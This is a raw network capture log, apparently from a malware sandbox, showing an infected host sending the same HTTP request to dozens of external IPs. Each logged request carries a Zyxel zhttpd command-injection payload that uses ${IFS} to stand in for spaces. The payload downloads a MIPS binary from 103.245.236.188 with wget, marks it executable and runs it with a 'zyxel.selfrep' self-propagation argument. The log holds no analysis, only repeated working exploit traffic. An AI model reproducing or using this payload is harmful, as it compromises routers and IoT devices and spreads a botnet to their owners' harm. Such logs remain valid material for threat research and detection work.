                                    Jan 13, 2024 19:02:23.931936026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1948192.168.2.135975497.116.158.53443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.931967020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1949192.168.2.1334386113.66.233.50443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.932012081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1950192.168.2.135270060.95.40.189443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.932039022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1951192.168.2.135525278.122.146.251443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.932059050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1952192.168.2.1351638129.180.37.151443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.932087898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1953192.168.2.1352202182.199.11.88443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.932132959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1954192.168.2.1358574174.10.6.225443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.932157993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1955192.168.2.1358128144.48.215.104443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.932192087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1956192.168.2.1355762212.8.140.220443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.932233095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1957192.168.2.1336040199.246.88.88443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.932259083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1958192.168.2.1345182185.139.141.94443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.932284117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1959192.168.2.1359284188.184.89.152443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.932328939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1960192.168.2.1352888190.111.195.81443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.932362080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1961192.168.2.1337634175.123.46.23443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.932396889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1962192.168.2.1350116165.84.155.124443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.932441950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1963192.168.2.1333910136.83.101.71443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.932477951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1964192.168.2.135019650.70.71.104443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.932521105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1965192.168.2.1347822130.207.69.154443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.932545900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1966192.168.2.133918686.6.41.111443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.932580948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1967192.168.2.1348800140.198.202.247443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.932616949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1968192.168.2.133280294.211.45.245443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.932661057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1969192.168.2.1341338185.189.145.195443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.932679892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1970192.168.2.1337812222.88.198.44443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.932734013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1971192.168.2.1360968128.171.184.107443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.932770014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1972192.168.2.1346988202.212.179.128443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.932784081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1973192.168.2.134286860.104.136.30443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.932840109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1974192.168.2.1337392201.28.129.163443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.932857037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1975192.168.2.1334148136.56.6.15443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.932903051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1976192.168.2.1348126217.129.76.213443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.932934046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1977192.168.2.1357308148.184.75.211443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.932976007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1978192.168.2.134978078.51.149.197443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.933016062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1979192.168.2.1356810192.222.124.203443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.933044910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1980192.168.2.133866618.94.200.110443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.933100939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1981192.168.2.134138864.219.188.236443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.933139086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1982192.168.2.1345568135.55.254.3443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.933175087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1983192.168.2.1346240105.127.208.228443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.933217049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1984192.168.2.1336362103.159.182.15443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.933240891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1985192.168.2.1345754222.147.230.163443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.933271885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1986192.168.2.135095083.200.160.13443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.933298111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1987192.168.2.1353674112.86.80.206443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.933321953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1988192.168.2.1346656217.71.154.129443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.933357954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1989192.168.2.1344756196.31.105.127443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.933391094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1990192.168.2.1343548167.190.98.120443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.933423996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1991192.168.2.1334532175.207.49.117443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.933463097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1992192.168.2.1346872115.198.140.209443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.933491945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1993192.168.2.135725095.85.3.200443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.933557034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1994192.168.2.1335814160.119.22.10443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.933573008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1995192.168.2.1342232149.19.182.229443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.933660984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1996192.168.2.1345230138.55.161.8443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.933661938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1997192.168.2.135294237.129.109.230443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.933672905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1998192.168.2.134875079.155.135.33443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.933708906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1999192.168.2.135302044.94.1.200443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.933739901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2000192.168.2.135553453.29.25.153443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.933768034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2001192.168.2.1340940191.38.28.191443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.933818102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2002192.168.2.1334484138.118.167.113443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.933865070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2003192.168.2.1334176193.252.237.219443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.933912039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2004192.168.2.1355602216.176.247.147443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.933912039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2005192.168.2.1333790164.207.234.244443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.933943987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2006192.168.2.133621818.197.249.182443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.934003115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2007192.168.2.135208839.130.27.32443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.934014082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2008192.168.2.135274612.103.201.48443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.934075117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2009192.168.2.133773820.154.188.79443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.934102058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2010192.168.2.1345776182.163.15.2443
                                    TimestampBytes transferredDirectionData
